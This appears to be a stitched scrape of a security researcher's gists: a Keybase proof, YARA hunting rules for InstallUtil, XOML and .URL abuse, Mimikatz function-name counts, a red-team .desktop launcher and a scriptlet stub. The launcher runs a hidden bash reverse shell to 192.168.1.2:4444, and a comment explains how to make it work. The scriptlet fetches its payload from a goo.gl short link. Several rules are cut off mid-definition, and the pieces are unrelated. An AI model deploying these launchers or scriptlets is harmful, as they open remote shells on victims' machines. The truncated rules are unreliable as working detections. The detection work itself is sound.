I hereby claim:
- I am itsreallynick on github.
- I am itsreallynick (https://keybase.io/itsreallynick) on keybase.
- I have a public key ASDBI4S7vhTSnA-yeUaMckHjZTAVTcOo8qpkRA1h9UCz_wo
To claim this, I am signing this object:
| Bulbasaur | |
| Ivysaur | |
| Venusaur | |
| Charmander | |
| Charmeleon | |
| Charizard | |
| Squirtle | |
| Wartortle | |
| Blastoise | |
| Caterpie |
| rule Hunting_InstallUtil_ProbablePayload | |
| { | |
| meta: | |
| author = "Nick Carr - @itsreallynick" | |
| description = "2019-05-22 - Focusing on the underlying structure that largely cannot change outside of obfuscation" | |
| strings: | |
| $installutil = "System.Configuration.Install" nocase ascii wide | |
| $override_func1 = "public override string HelpText" nocase ascii wide | |
| $override_func2 = "public override void Uninstall" nocase ascii wide | |
| $override_func3 = "public override void Install" nocase ascii wide |
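# Red-team PoC .desktop launcher. The original listing wrapped every line in
# markdown table cells, which makes the file unparsable as a Desktop Entry, so
# the cells are stripped here; the keys and values are unchanged.
[Desktop Entry]
Name=GoShortcutItsYourEpoch
# Reverse shell to a lab address (RFC 1918, port 4444 — placeholders).
# NOTE(review): the Desktop Entry spec gives Exec no shell semantics; a launcher
# that execs the parsed argv directly hands ">&", the /dev/tcp path and "0>&1"
# to bash as positional arguments rather than as redirections. If that is the
# case on the target, the portable form is to wrap the command in a shell,
# Exec=/bin/bash -c "bash -i >& /dev/tcp/192.168.1.2/4444 0>&1"; left as
# written to preserve the original PoC.
Exec=/bin/bash -i >& /dev/tcp/192.168.1.2/4444 0>&1
# Icon is a remote URL behind a link shortener rather than an icon name or
# absolute path; presumably this is meant as a fetch-on-view beacon / detection
# artifact (compare Windows .url icon callbacks) — confirm against the target
# file manager, as handling of URL icons varies.
Icon=http://bit.ly/icon-png
# No terminal window is opened, so nothing is shown to the user on launch.
Terminal=false
Type=Application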
| // Background: | |
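// Hunts for non-PE files carrying a Windows Workflow Foundation XOML activity
// definition (presumably the loose .xoml input used with the workflow-compiler
// abuse; the "// Background:" line above was truncated so the page does not say).
// The original listing lacked the closing brace and wrapped lines in markdown
// table cells; both are repaired here and the rule logic is unchanged.
rule Hunting_Workflow_Collection_XOML {
    meta:
        author = "Nick Carr - @itsreallynick"
    strings:
        $workflow1 = "<SequentialWorkflowActivity" nocase ascii wide
        // NOTE(review): a 4-byte, nocase, ascii+wide atom is about as weak as
        // YARA strings get and will draw a "may slow down scanning" warning; it
        // only stays useful because the condition ANDs it with $workflow1.
        $workflow2 = "Code" nocase ascii wide
    condition:
        // 0x5A4D is "MZ": exclude PE files so the hit is the XOML text itself,
        // not a compiled assembly. `new_file` is not a YARA builtin — it appears
        // to be a VirusTotal Livehunt external variable; stock yara needs it
        // supplied with -d new_file=true (or the term removed) or the rule will
        // not compile.
        uint16(0) != 0x5A4D and all of ($workflow*) and new_file
}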
| rule Methodology_Suspicious_Shortcut_Local_URL | |
| { | |
| meta: | |
| author = "@itsreallynick (Nick Carr), @QW5kcmV3 (Andrew Thompson)" | |
| description = "Detects local script usage for .URL persistence" | |
| reference = "https://twitter.com/cglyer/status/1176184798248919044" | |
| strings: | |
| $file = "URL=file:///" nocase | |
| $url_clsid = "[{000214A0-0000-0000-C000-000000000046}]" | |
| $url_explicit = "[InternetShortcut]" nocase |
| 143 function Invoke-Mimidogz | |
| 140 function Invoke-Mimikatz | |
| 29 function Invoke-Mimi | |
| 10 function Chokorun | |
| 7 function Invoke-Ttest | |
| 7 function Invoke-Mimiwormz | |
| 7 function Invoke-Me | |
| 6 function Invoke-Mimiturtle | |
| 6 function Invoke-Mimimi | |
| 5 function output |
I hereby claim:
To claim this, I am signing this object:
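<!-- Windows Script Component stub: its only content is a script element whose
     src is a goo.gl short link, so the actual payload is fetched at load time
     from wherever the shortener resolves. Nothing on this page shows what that
     is, so treat the link as untrusted and resolve it in a sandbox. The
     markdown table cells around the original line are dropped. -->
<component><script src="http://goo.gl/fxtJVt"></script></component>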
// PoC payload for a WSH/scriptlet host: spawn calc.exe through the
// WScript.Shell COM object. The global itsreallycalc keeps whatever Run()
// returns; it is not used further here.
var wshShell = new ActiveXObject("WScript.Shell");
var itsreallycalc = wshShell.Run("calc.exe");
| rule help_Elm0d | |
| { | |
| meta: | |
| author = "@ItsReallyNick - Nick Carr" | |
| description = "We are STILL helping https://twitter.com/Elm0D find his files" | |
| reference = "https://twitter.com/ItsReallyNick/status/902702954272223232" | |
| strings: | |
| $elm0d = /[^a-z0-9]elm0d[^a-z0-9]/ nocase ascii wide | |
| $lol_infra = "iso9001-certificare.ro" nocase ascii wide | |
| $lol_website = "www.elm0d.tk" nocase ascii wide |